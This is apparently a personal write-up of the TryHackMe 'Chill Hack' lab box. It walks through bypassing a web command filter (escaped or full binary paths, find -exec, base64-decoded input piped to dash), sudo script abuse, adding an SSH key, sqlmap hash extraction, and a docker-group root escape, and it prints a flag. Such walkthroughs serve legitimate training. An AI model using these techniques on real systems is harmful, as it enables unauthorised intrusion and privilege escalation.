THM: Chill Hack

Introduction

Chill the Hack out of the Machine.
Intermediate level CTF. Capture the flags and have fun!

This is Chill Hack from TryHackMe. It’s medium rated.

Ports

We’ve got FTP, SSH and HTTP on port 80.

FTP

Anonymous login is permitted, and there is a note.txt that gives some message about filtering or something; not very interesting. It’s relevant to the next bit but adds nothing important.

HTTP

On the website there is a directory called /secret which you could easily find with gobuster or whatever; I actually just guessed that it existed. It has a box in which commands can be entered and these are executed by the server, but most of the common linux commands are disallowed; eg ls, cat etc.

When I completed this box there were no writeups, but after some were released I went and looked at them and found a fascinating array of ways in which people got around this. Basically the underlying filter was a string comparison of the entered text with a set of disallowed commands.

So people defeated this is a range of ways including:

1. bash is not the same as /bin/bash from a string comparison perspective, so a fully quoted binary path defeats the filter
2. b\ash is not the same as bash even though the escape character is ignored, because the string comparison happens first
3. find is allowed, and can be used to execute other commands with the -exec switch

Anyway I found that all very interesting. What I did was different. There are a variety of shells available on a typical linux box which may include sh, bash, zsh, dash and potentially others. We had no sh, bash or zsh but we did have dash. How could we use this? What I found was this pattern:

echo d2hpY2ggcHl0aG9uMw==  | base64 -d | dash

So we will echo a base64 encoded command (cat /etc/passwd, a reverse shell or whatever), pipe it to base64 to decode, and then pipe it to dash. This was how I got a shell as www-data.

On the box

In /var/www there are two subdirectories - files and html. This will be relevant. But first we run sudo -l

Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh

This shell script (which I failed to make a copy of) allowed you to run commands, even though it wasn’t particularly obvious that was what was happening. You responded to a prompt twice - what you entered an the second prompt was a command or would be run as one. I just used this to launch bash as apaar.

apaar

Apaar has an authorized_keys file, so we can add our SSH public key and then SSH in as apaar:

apaar@ubuntu:~/.ssh$ printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC  AND THE REST OF MY PUBLIC KEY mPg33/0opPfH/J/n9P7Wr6pOF6rz8cPZEiQKSgCTe8/jq4xft4aQKEKx8NlGkYjlKaxnz2kaLxuJmw+gGkaUOm/orR1AjlnSE= root@kali' >> authorized_keys

We can see something is running on port 9001 (thanks linpeas), so we’ll set up an SSH port forward:

root@kali:~# ssh -L 9999:127.0.0.1:9001 apaar@10.10.14.113

And visit localhost:9999 in the browser. We get the website from the /var/www/files directory I mentioned earlier, which has a login page. We can send that to sqlmap and extract two easily cracked hashes:

7e53614ced3640d5de23f111806cc4fd:masterpassword
686216240e5af30df0501e53c789a649:dontaskdonttell

Which ultimately turn out to be useless. If we log in with one of these and the username aurick (I think it was, I’m going from memory because I didn’t write this down), we get served a different page with a picture of a spooky hacker and a message about searching in the dark or something. We already had access to this stuff earlier, so … yeah. Didn’t really gain anything from that.

In the dark

Up until this point I’d been enjoying this box. Now comes the stego - arrrragh.

Download the hacker picture thing, run steghide (no password), get password protected zip file, crack that with john, read base64 encoded creds. Here’s what my bash history looked like:

191 steghide extract -sf hacker-with-laptop_23-2147985341.jpg
192 file backup.zip
193 ls
194 unzip backup.zip
195 locate zip2john
196 zip2john backup.zip > backup.john
197 john backup.john -w=/usr/share/wordlists/rockyou.txt
198 unzip backup.zip
199 cat source_code.php

I’m skipping over this a bit because it gave me the shits. I hate stego.

Privesc

Anyway our new user is in the docker group:

anurodh@ubuntu:/dev/shm$ docker run -it -v /:/mnt alpine chroot /mnt
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@c98abe29c255:/# ls
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz
root@c98abe29c255:/# cd /root
root@c98abe29c255:~# ls
proof.txt
root@c98abe29c255:~# cat proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}
Congratulations! You have successfully completed the challenge.

Yay I guess. This could have been a good challenge but ultimately it fell a bit short for mine. The SSH port forward was a nice touch but ultimately it was unnecessary. The box was supposed to be ‘real life’ like but then - surprise! - stego. I think I’m going to make my own box soon, I have some ideas.